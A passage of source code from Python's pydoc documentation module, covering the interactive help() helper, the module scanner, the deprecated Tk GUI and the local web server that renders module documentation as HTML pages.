'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.items():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING range LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS MAPPINGMETHODS '
'NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global nonlocal ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'CONVERSIONS': ('conversions', ''),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS NUMBERS TUPLELITERALS '
'LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
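    # Sentinel used to tell "help()" called with no argument (start the
    # interactive helper) apart from an explicit request for a specific object.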
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = replace(request, '"', '', "'", '').strip()
if request.lower() in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using input() when appropriate."""
if self.input is sys.stdin:
return input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
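    # help() dispatch order: literal commands ('help', 'keywords', 'symbols',
    # 'topics', 'modules', 'modules <key>'), then symbol, keyword and topic
    # names, and finally anything else is passed to doc() as an object path.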
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(request.split()[1])
elif request in self.symbols: self.showsymbol(request)
elif request in ['True', 'False', 'None']:
# special case these keywords since they are objects too
doc(eval(request), 'Help on %s:')
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:', output=self._output)
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:', output=self._output)
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/%s/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % tuple([sys.version[:3]]*2))
def list(self, items, columns=4, width=80):
items = list(sorted(items))
colw = width // columns
rows = (len(items) + columns - 1) // columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw - 1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import formatter
buffer = io.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + ', '.join(xrefs.split()) + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''' , '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
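    # next() performs a depth-first walk using an explicit stack of
    # (node, remaining-children) pairs; descendp decides whether a returned
    # child's own children will be visited on later calls.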
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
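        # Two passes: built-in modules first, then everything found by
        # pkgutil.walk_packages().  A key, if given, is matched
        # case-insensitively against "modname - synopsis" strings.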
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
# XXX Skipping this file is a workaround for a bug
# that causes python to crash with a segfault.
# http://bugs.python.org/issue9319
#
# TODO Remove this once the bug is fixed.
if modname in {'test.badsyntax_pep3120', 'badsyntax_pep3120'}:
continue
if key is None:
callback(None, modname, '')
else:
try:
loader = importer.find_module(modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except UnicodeDecodeError:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
try:
module = loader.load_module(modname)
except ImportError:
if onerror:
onerror(modname)
continue
                    desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- Web browser interface
def serve(port, callback=None, completer=None):
import http.server, email.message, select
msg = 'the pydoc.serve() function is deprecated'
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class DocHandler(http.server.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(html.page(title, contents).encode('utf-8'))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport as value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = [x for x in sys.builtin_module_names if x != '__main__']
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + ' '.join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts Web server and pops up a control window)."""
    msg = ('the pydoc.gui() function and "pydoc -g" option are deprecated; '
           'use the pydoc.browse() function and "pydoc -b" option instead.')
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import tkinter
self.server_frm = tkinter.Frame(window)
self.title_lbl = tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = tkinter.Frame(window)
self.search_lbl = tkinter.Label(self.search_frm, text='Search for')
self.search_ent = tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = tkinter.Frame(window)
self.goto_btn = tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
import webbrowser
webbrowser.open(url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = self.result_lst.get(selection[0]).split()[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import tkinter
try:
root = tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', '%s; charset=UTF-8' % content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
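        # serve_until_quit() polls the listening socket with a one-second
        # select() timeout so the quit flag set by ServerThread.stop() is
        # noticed promptly.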
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the _pydoc.css style
sheet is read and returned if it exists.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
css_path = "pydoc_data/_pydoc.css"
css_link = (
'<link rel="stylesheet" type="text/css" href="%s">' %
css_path)
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Pydoc: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>
</body></html>''' % (title, css_link, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p align=right><font color="#909090" face="helvetica,'
'arial"><strong>pydoc</strong> by Ka-Ping Yee'
'&lt;ping@lfw.org&gt;</font>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading(
'<big><big><strong>Search Results</strong></big></big>',
'#ffffff', '#7799ee')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection(
'key = %s' % key, '#ffffff', '#ee77aa', '<br>'.join(results))
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with tokenize.open(path) as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading(
'<big><big><strong>File Listing</strong></big></big>',
'#ffffff', '#7799ee')
contents = heading + html.bigsection(
'File: %s' % path, '#ffffff', '#ee77aa', body)
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Topics', '#ffffff', '#ee77aa', contents)
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Keywords', '#ffffff', '#ee77aa', contents)
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'KEYWORD'
else:
title = 'TOPIC'
heading = html.heading(
'<big><big><strong>%s</strong></big></big>' % title,
'#ffffff', '#7799ee')
contents = '<pre>%s</pre>' % html.markup(contents)
contents = html.bigsection(topic, '#ffffff', '#ee77aa', contents)
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.section('Related help topics: ',
'#ffffff', '#ee77aa', xrefs)
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading(
'<big><big><strong>Error</strong></big></big>',
'#ffffff', '#7799ee')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, '#ffffff', '#bb0000',
contents)
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if content_type == 'text/css':
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, url)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
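# Illustrative routing examples (not executed), following get_html_page() above:
#   'index.html'        -> html_index()
#   'topics.html'       -> html_topics()
#   'search?key=socket' -> html_search('socket')
#   'get?key=os.path'   -> html_getobj('os.path'), falling back to html_topicpage()
#   'os.path.html'      -> html_getobj('os.path')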
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
